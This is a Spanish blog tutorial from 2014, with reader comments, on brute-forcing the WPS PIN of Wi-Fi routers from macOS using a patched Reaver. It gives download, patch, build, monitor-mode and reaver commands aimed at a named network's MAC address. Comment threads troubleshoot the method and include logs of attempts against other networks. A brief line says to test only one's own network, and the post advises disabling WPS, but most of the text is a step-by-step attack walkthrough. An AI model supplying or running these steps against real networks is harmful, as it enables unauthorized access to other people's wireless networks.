Portada del sitio > Sistemas > MacOS > [ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS
[ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS
Martes 8 de abril de 2014, por
Se acostumbran a usar CD de pentest que funcionan bajo linux, como backtrack , Cali linux o Wifiway para comprobar la seguridad de una red wireless. Recomiendo que hagas esto en tu propia red para comprobar la seguridad de esta.
Esto son los pasos para Mac OS X Mavericks
Abrimos la terminal y creamos un enlace simbolico a airport así:
$ sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport
Con este comando ya podremos llamar al programa airport directo desde el terminal.
Descargando y pacheando reaver
Reaver es una aplicación que se encarga de explotar las redes wifi utilizando ataques de fuerza bruta contra el WPS ( Wi-fi Protected Setup) , el WPS es un código numérico utilizado en muchos routers, para autenticar a dispositivos mobiles.
Reaver por defecto solo funciona en Linux. pero se puede pachear , para que funcione también en Mac OS.
Procedamos pues a la Instalación:
$ curl "https://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz" $ curl http://www.redaven.com/download/reaver_osx.diff > reaver_osx.diff $ tar xvfz reaver-1.4.tar.gz $ cd reaver*/src $ patch -p0 -i ../../reaver_osx.diff $ ./configure $ make $ sudo make install
Red en1 en modo monitor
Ahora abrimos una pestaña de la terminal presionando la tecla CMD + T
en esta terminal ejecutamos el siguiente comando.
$ sudo airport en1 sniff 1
Funcionamiento de Reaver
Analizamos las redes i miramos que no tengan bloqueado el WPS. eso lo logramos ejecutando el comando:
En este caso en todas se puede conseguir la password.
Ahora se debería poner reaver a la acción lo haríamos con el siguiente comando.
$ sudo reaver -i en1 -b [ La mac ] -vvvv -S -L
En este caso por ejemplo para WLAN_07C0
$ sudo reaver -i en1 -b 74:88:8B:A6:07:C1 -vvvv -S -L
Dentro de unas horas ya tenemos la clave de la red.
Aconsejo que no solo cambieis la password de vuestra red wireless ni el ESSID si no que busqueis dentro de las opciones wireless y desactiveis la opción que dice WPS.
Con esto será ya mucho más difícil acceder a las redes wireless ajenas.
Saludos!
Mensajes
1. [ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS, 29 de mayo de 2014, 21:12, por Yone
sudo airport en1 sniff 1
Error al configurar el puerto
Aunque antes con el comando patch -p0 -i ../../reaver_osx.diff me dice que no encuentra ese archivo... aunque antes de eso me da un 404 forbiden en el segundo enlace de descarga... en fin, algunos no estamos hechos para esto.
1. [ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS, 5 de junio de 2014, 11:21, por Aitor Roma Vázquez
Yone, resubido el patch a nuestros servidores!! saludos!!!
2. Y el wget?, 30 de mayo de 2014, 11:44, por Alberto Lozano
Deberías de indicar primero cómo instalar wget... :)
3. [ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS, 5 de junio de 2014, 11:20, por Aitor Roma Vázquez
Hola Alberto, he modificado el articulo para funcionar con curl que lo trae por defecto MacOS X
Saludos!
4. [ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS, 31 de agosto de 2014, 21:39, por erase/replace
no sé qué estoy haciendo mal... pero después de este comando hace nada
$ sudo reaver -i en1 -b [ La mac ] -vvvv -S -L
1. [ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS, 21 de octubre de 2014, 12:49, por Aitor Roma Vázquez
Hola, donde dice [la mac] debes remplazar por la mac detectada!!
5. [ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS, 22 de noviembre de 2014, 20:13, por sebas
pongo el primer comando y me pide password
1. [ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS, 23 de junio de 2016, 14:39, por Aitor Roma Vázquez
Te pide password porque necesita derechos administrativos!
Saludos!
6. [ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS, 13 de febrero de 2015, 00:24, por shorlo
a mi parece que todo lo demás se descarga y se configura bien, pero a la hora de poner el
xxxxxx:src xxxxxx$ sudo make install
Password:xxxxxxxxxxxxx
rm -f /usr/local/bin/reaver /usr/local/bin/wash /usr/local/bin/walsh
if [ ! -d /usr/local/etc/reaver ]; then mkdir -p /usr/local/etc/reaver; fi
if [ ! -e /usr/local/etc/reaver/reaver.db ]; then cp reaver.db /usr/local/etc/reaver/reaver.db && chmod -R a+rw /usr/local/etc/reaver; fi
if [ -e wash ]; then cp wash /usr/local/bin/wash; fi
cp: /usr/local/bin/wash: No such file or directory
make: *** [install] Error 1
7. [ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS, 1ro de marzo de 2015, 14:32, por Root
Hola, estoy intentandolo , pero me pide un password y no se cual es
1. [ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS, 23 de junio de 2016, 14:40, por Aitor Roma Vázquez
Hola, es el password de tu usuario! si es administrador te servira!! saludos!
8. [ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS, 20 de mayo de 2015, 16:36, por enrique
Hola, tengo una pregunta. Este método se puede aplicar en Yosemite?
1. [ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS, 6 de junio de 2015, 04:36, por Aitor Roma Vázquez
Sí también debería funcionarte en yosemite!
9. [ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS, 14 de abril de 2016, 07:02, por Marco
Todo me funciona bien, excepto que reavel solo intenta el mismo PIN siempre 12345670
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
Alguna idea de como solucionar el error ?
1. [ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS, 23 de junio de 2016, 14:42, por Aitor Roma Vázquez
Hola, Marco alguna vez aparece sobretodo en routers Orange y es debido a que tiene un número X de reintentos si los superas desactivan el WPS suele ocurrir en algunos modelos de routers nuevos!
10. [ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS, 26 de mayo de 2016, 20:27, por Txus Black
Hola como estas?
Tengo un problema, al ejecutar:
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport
Me presenta el error de Operation not permitted, te agradecería si sabes la soluciona comentarme, Gracias :D
1. [ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS, 23 de junio de 2016, 14:37, por Aitor Roma Vázquez
Hola , intenta ejecutar sudo -i y luego realizar el comando como root a ver si te funciona! saludos!
2. [ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS, 19 de septiembre de 2016, 17:59, por Vangeliz Romo Pedrez
El comando es así.
$ sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
En las versiones de El capitan se debe usar otro path.
Saludos. Ojalá todavía sirva.
3. [ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS, 27 de septiembre de 2016, 18:26, por Aitor Roma Vázquez
Muchas Gracias Vangeliz!
Aún no me he pasado a capitan jejeje
11. [ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS, 8 de agosto de 2016, 04:27, por Andrew
Hey, I can’t make it works... do u know what could happen?
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
pcap_activate status -6
[X] ERROR: Failed to compile packet filter
12. [ Hacking ] Crack de redes Wireless bruteforce a WPS en MacOS, 13 de octubre de 2016, 09:24, por Chelo
Hola Bro, como vas? Sigo tu tutorial al pie de la letra pero alfinal me dice esto y se queda tirandolo repetidas veces sin avanzar:
[+] Waiting for beacon from 40:4A:03:C8:20:86
[+] Switching en0 to channel 1
[+] Switching en0 to channel 2
[+] Switching en0 to channel 3
[+] Switching en0 to channel 4
[+] Switching en0 to channel 5
[+] Switching en0 to channel 6
[+] Switching en0 to channel 7
[+] Switching en0 to channel 8
[+] Switching en0 to channel 9
[+] Switching en0 to channel 10
+] Associated with 40:4A:03:C8:20:86 (ESSID: tecnimet)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
Y se queda trabado en sos ultimos mensajes repitiendo el timeout... Tenes idea puedo hacer?